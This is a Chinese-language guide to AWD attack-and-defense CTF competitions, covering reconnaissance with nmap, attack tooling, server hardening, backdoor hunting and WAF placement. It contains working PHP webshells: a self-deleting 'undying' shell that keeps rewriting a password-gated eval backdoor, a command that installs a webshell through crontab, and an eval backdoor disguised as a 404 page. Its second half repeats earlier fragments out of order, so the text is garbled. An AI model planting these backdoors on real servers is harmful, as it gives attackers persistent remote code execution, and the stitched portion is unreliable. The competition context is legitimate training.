AWD比赛完全攻略手册<\/h1>

一、AWD竞赛概述<\/h2>
AWD（Attack With Defense）是一种网络安全竞赛模式，参赛队伍需要在保护自己服务器的同时攻击其他队伍的服务器。<\/p>

1.1 主要题型<\/h3>

WEB类<\/strong>：占比较大，涉及CMS和框架安全漏洞

常见漏洞：注入、上传、反序列化等<\/li>
主要语言：PHP为主，少量Java、Python<\/li> <\/ul> <\/li>
PWN类<\/strong>：二进制漏洞利用<\/li> <\/ul>
1.2 竞赛拓扑<\/h3>
比赛通常分为两个阶段：<\/p>

加固环节<\/strong>：统一加固自己的服务器<\/li>
攻击环节<\/strong>：攻击其他队伍的服务器获取FLAG<\/li> <\/ol>
二、赛前准备<\/h2>
2.1 必备工具清单<\/h3>

SSH客户端<\/strong>：Xshell、FinalShell、SecureCRT<\/li>
FTP工具<\/strong>：FileZilla、WinSCP<\/li>
扫描工具<\/strong>：

Nmap<\/li>
httpscan<\/li>
dirsearch<\/li> <\/ul> <\/li>
漏洞利用工具<\/strong>：

Xray<\/li>
pocsuite3<\/li>
Hydra<\/li> <\/ul> <\/li>
自动化框架<\/strong>：

AWD-Predator-Framework<\/li> <\/ul> <\/li>
查杀工具<\/strong>：

河马WEBSHELL查杀<\/li>
D盾<\/li> <\/ul> <\/li> <\/ul>
三、信息收集<\/h2>
3.1 主机探测<\/h3>
ifconfig # Linux查看IP<\/span> <\/span><\/span>ipconfig # Windows查看IP<\/span> <\/span><\/span>nmap -sn 192.168.0.0\/24 # 扫描C段存活主机<\/span> <\/span><\/span>httpscan.py 192.168.0.0\/24 -t 10<\/span> # 替代扫描方式<\/span> <\/span><\/span><\/code><\/pre>3.2 端口探测<\/h3> nmap -sV 192.168.0.2 # 扫描系统版本<\/span> <\/span><\/span>nmap -sS 192.168.0.2 # 扫描常用端口<\/span> <\/span><\/span>nmap -sS -p 80,445 192.168.0.2 # 扫描指定端口<\/span> <\/span><\/span>nmap -sS -p- 192.168.0.2 # 全端口扫描<\/span> <\/span><\/span><\/code><\/pre>3.3 应用发现<\/h3> # 定位关键配置文件<\/span> <\/span><\/span>find \/ -name "nginx.conf"<\/span> <\/span><\/span>find \/ -path "*nginx*"<\/span> -name nginx*conf <\/span><\/span>find \/ -name "httpd.conf"<\/span> <\/span><\/span>find \/ -path "*apache*"<\/span> -name apache*conf <\/span><\/span>find \/ -name "index.php"<\/span> # 定位网站目录<\/span> <\/span><\/span> <\/span><\/span># 日志文件位置<\/span> <\/span><\/span>\/var\/log\/nginx\/ # Nginx日志<\/span> <\/span><\/span>\/var\/log\/apache\/ # Apache日志<\/span> <\/span><\/span>\/var\/log\/apache2\/ <\/span><\/span>\/usr\/local\/tomcat\/logs # Tomcat日志<\/span> <\/span><\/span>tail -f xxx.log # 实时查看日志<\/span> <\/span><\/span><\/code><\/pre>3.4 备份扫描<\/h3> 自动化扫描工具： ihoneyBakFileScan<\/a><\/li> dirsearch<\/a><\/li> <\/ul> <\/li> <\/ul> 四、攻击技术<\/h2> 4.1 端口利用<\/h3> 常见攻击方式<\/strong>：未授权访问<\/li> 弱口令爆破<\/li> <\/ul> <\/li> <\/ul> 工具推荐<\/strong>：<\/p> Hydra<\/a><\/li> SNETCracker<\/a><\/li> DBScanner<\/a><\/li> unauthorized-check<\/a><\/li> <\/ul> 字典资源<\/strong>：<\/p> fuzzDicts<\/a><\/li> TheKingOfDuck\/fuzzDicts<\/a><\/li> <\/ul> 4.2 WEB服务攻击<\/h3> 已知框架漏洞<\/strong>：使用工具快速扫描利用<\/li> 自定义框架<\/strong>：分析日志学习其他选手攻击方式<\/li> <\/ul> 漏洞资料库<\/strong>：<\/p> vulbase<\/a><\/li> <\/ul> 检测工具<\/strong>：<\/p> Xray<\/a><\/li> pocsuite3<\/a><\/li> gobies<\/a><\/li> <\/ul> 4.3 权限维持技术<\/h3> 4.3.1 隐藏文件读取<\/h4> header<\/span>('flag:'<\/span>.<\/span>file_get_contents<\/span>('\/tmp\/flag'<\/span>)); <\/span><\/span><\/code><\/pre>4.3.2 PHP不死马<\/h4> <?<\/span>php<\/span> <\/span><\/span>ignore_user_abort<\/span>(true<\/span>); <\/span><\/span>set_time_limit<\/span>(0<\/span>); <\/span><\/span>unlink<\/span>(__FILE__<\/span>); <\/span><\/span>$file =<\/span> '2.php'<\/span>; <\/span><\/span>$code =<\/span> '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);}'<\/span>; <\/span><\/span>while<\/span>(1<\/span>){ <\/span><\/span> file_put_contents<\/span>($file,$code); <\/span><\/span> system<\/span>('touch -m -d "2018-12-01 09:10:12" .2.php'<\/span>); <\/span><\/span> usleep<\/span>(5000<\/span>); <\/span><\/span>} <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>4.3.3 定时任务写马<\/h4> system<\/span>('echo echo \"<?php if(md5($_POST[pass])==\'7b7fdffef464019f7190d0384d5b3838\'){ @eval($_POST[1]); } \" > \/var\/www\/html\/.index.php \n * * * * * chmod 777 \/var\/www\/html\/.index.php " | crontab;whoami'<\/span>); <\/span><\/span><\/code><\/pre>4.4 快速得分策略<\/h3> 编写Python脚本批量获取FLAG<\/li> 使用curl工具自动化提交<\/li> 利用框架：AWD-Predator-Framework<\/a><\/li> <\/ul> 五、防御技术<\/h2> 5.1 网站备份<\/h3> # 压缩备份<\/span> <\/span><\/span>tar -cvf web.tar \/var\/www\/html <\/span><\/span>zip -q -r web.zip \/var\/www\/html <\/span><\/span> <\/span><\/span># 解压恢复<\/span> <\/span><\/span>tar -xvf web.tar -c \/var\/www\/html <\/span><\/span>unzip web.zip -d \/var\/www\/html <\/span><\/span> <\/span><\/span># 文件传输<\/span> <\/span><\/span>scp username@servername:\/path\/filename \/tmp\/local_destination # 下载<\/span> <\/span><\/span>scp \/path\/local_filename username@servername:\/path # 上传<\/span> <\/span><\/span><\/code><\/pre>5.2 数据库备份<\/h3> # MySQL备份<\/span> <\/span><\/span>mysqldump -u username -p password databasename > bak.sql # 单库<\/span> <\/span><\/span>mysqldump --all-databases > bak.sql # 全库<\/span> <\/span><\/span> <\/span><\/span># 恢复<\/span> <\/span><\/span>mysql -u username -p password database < bak.sql <\/span><\/span><\/code><\/pre>5.3 信息搜集防御<\/h3> netstat -ano\/-a # 查看端口<\/span> <\/span><\/span>uname -a # 系统信息<\/span> <\/span><\/span>ps -aux # 进程信息<\/span> <\/span><\/span>cat \/etc\/passwd # 用户情况<\/span> <\/span><\/span>find \/ -type d -perm -002 # 可写目录检查<\/span> <\/span><\/span>grep -r "flag"<\/span> \/var\/www\/html\/ # 查找FLAG<\/span> <\/span><\/span><\/code><\/pre>5.4 口令更改<\/h3> passwd username # SSH密码修改<\/span> <\/span><\/span># MySQL密码修改<\/span> <\/span><\/span>set password for<\/span> mycms@localhost =<\/span> password(<\/span>'123'<\/span>)<\/span>; <\/span><\/span># 查找配置文件中的密码<\/span> <\/span><\/span>find \/var\/www\/html -path '*config*'<\/span> <\/span><\/span><\/code><\/pre>5.5 后门查杀<\/h3> # 查找可疑文件<\/span> <\/span><\/span>find \/var\/www\/html -name *.php -mmin -20 # 最近修改<\/span> <\/span><\/span>find .\/ -name '*.php'<\/span> | xargs wc -l | sort -u # 短文件<\/span> <\/span><\/span>grep -r --include=<\/span>*.php '[^a-z]eval($_POST'<\/span> \/var\/www\/html <\/span><\/span>find \/var\/www\/html -type f -name "*.php"<\/span> | xargs grep "eval("<\/span> | more <\/span><\/span> <\/span><\/span># 不死马查杀<\/span> <\/span><\/span><?php system(<\/span>"kill -9 pid;rm -rf .shell.php"<\/span>)<\/span>; ?> <\/span><\/span> <\/span><\/span># 后门用户查杀<\/span> <\/span><\/span>userdel -r username # 完全删除账户<\/span> <\/span><\/span><\/code><\/pre>5.6 关闭进程和端口<\/h3> ps -aux # 查看进程<\/span> <\/span><\/span>kill -9 pid # 强制终止<\/span> <\/span><\/span> <\/span><\/span>netstat -anp # 查看端口<\/span> <\/span><\/span>firewall-cmd --zone=<\/span>public --remove-port=<\/span>80\/tcp --permanent # 关闭端口<\/span> <\/span><\/span>firewall-cmd --reload # 重载防火墙<\/span> <\/span><\/span><\/code><\/pre>5.7 漏洞修复原则<\/h3> 保证服务不长时间宕机<\/li> 使用安全过滤函数<\/li> 无法修复时先注释或删除相关代码<\/li> 保证页面显示正常<\/li> <\/ol> 修复参考<\/strong>：<\/p> 常规漏洞修复建议<\/a><\/li> PHP安全函数<\/a><\/li> <\/ul> 5.8 文件监控<\/h3> 工具：FileMonitor<\/a><\/li> <\/ul> 5.9 WAF部署<\/h3> 常见CMS的WAF添加路径<\/strong>：<\/p> DiscuzX2: \config\config_global.php<\/li> Wordpress: \wp-config.php<\/li> Metinfo: \include\head.php<\/li> PHPCMS V9: \phpcms\base.php<\/li> PHPWIND8.7: \data\sql_config.php<\/li> DEDECMS5.7: \data\common.inc.php<\/li> <\/ul> WAF脚本参考<\/strong>：<\/p> CTF-WAF<\/a><\/li> <\/ul> 六、经典后门示例<\/h2> 6.1 preg_replace伪装的404后门<\/h3> <!<\/span>DOCTYPE<\/span> HTML<\/span> PUBLIC<\/span> "-\/\/IETF\/\/DTD HTML 2.0\/\/EN"<\/span>><\/span> <\/span><\/span><<\/span>html<\/span>><<\/span>head<\/span>><\/span> <\/span><\/span><<\/span>title<\/span>><\/span>404<\/span> Not<\/span> Found<\/span><\/<\/span>title<\/span>><\/span> <\/span><\/span><\/<\/span>head<\/span>><<\/span>body<\/span>><\/span> <\/span><\/span><<\/span>h1<\/span>><\/span>Not<\/span> Found<\/span><\/<\/span>h1<\/span>><\/span> <\/span><\/span><<\/span>p<\/span>><\/span>The<\/span> requested<\/span> URL<\/span> was<\/span> not<\/span> found<\/span> on<\/span> this<\/span> server<\/span>.<\/<\/span>p<\/span>><\/span> <\/span><\/span><\/<\/span>body<\/span>><\/<\/span>html<\/span>><\/span> <\/span><\/span><?<\/span>php<\/span> <\/span><\/span>@<\/span>preg_replace<\/span>("\/[pageerror]\/e"<\/span>,$_POST['error'<\/span>],"saft"<\/span>); <\/span><\/span>header<\/span>('HTTP\/1.1 404 Not Found'<\/span>); <\/span><\/span>?><\/span> <\/span><\/span><\/span><\/code><\/pre>使用菜刀连接，密码:error<\/p> 七、总结<\/h2> AWD比赛考验选手的攻防兼备能力，需要：<\/p> 快速信息收集能力<\/li> 漏洞利用和修复能力<\/li> 自动化脚本编写能力<\/li> 团队协作能力<\/li> <\/ol> 建议平时积累：<\/p> 常见漏洞的EXP库<\/li> 自动化脚本库<\/li> 各种扫描工具库<\/li> 漏洞修复方案库<\/li> <\/ul>

AWD比赛完全攻略手册<\/h1>

一、AWD竞赛概述<\/h2> AWD（Attack With Defense）是一种网络安全竞赛模式，参赛队伍需要在保护自己服务器的同时攻击其他队伍的服务器。<\/p>

二、赛前准备<\/h2>

三、信息收集<\/h2>

3.4 备份扫描<\/h3> 自动化扫描工具： ihoneyBakFileScan<\/a><\/li> dirsearch<\/a><\/li> <\/ul> <\/li> <\/ul> 四、攻击技术<\/h2> 4.1 端口利用<\/h3> 常见攻击方式<\/strong>： 未授权访问<\/li>

四、攻击技术<\/h2>

4.1 端口利用<\/h3> 常见攻击方式<\/strong>： 未授权访问<\/li>

4.2 WEB服务攻击<\/h3> 已知框架漏洞<\/strong>：使用工具快速扫描利用<\/li>

4.3 权限维持技术<\/h3>

五、防御技术<\/h2>

5.8 文件监控<\/h3> 工具：FileMonitor<\/a><\/li> <\/ul> 5.9 WAF部署<\/h3> 常见CMS的WAF添加路径<\/strong>：<\/p>

5.9 WAF部署<\/h3> 常见CMS的WAF添加路径<\/strong>：<\/p>

六、经典后门示例<\/h2>

一、AWD竞赛概述<\/h2>
AWD（Attack With Defense）是一种网络安全竞赛模式，参赛队伍需要在保护自己服务器的同时攻击其他队伍的服务器。<\/p>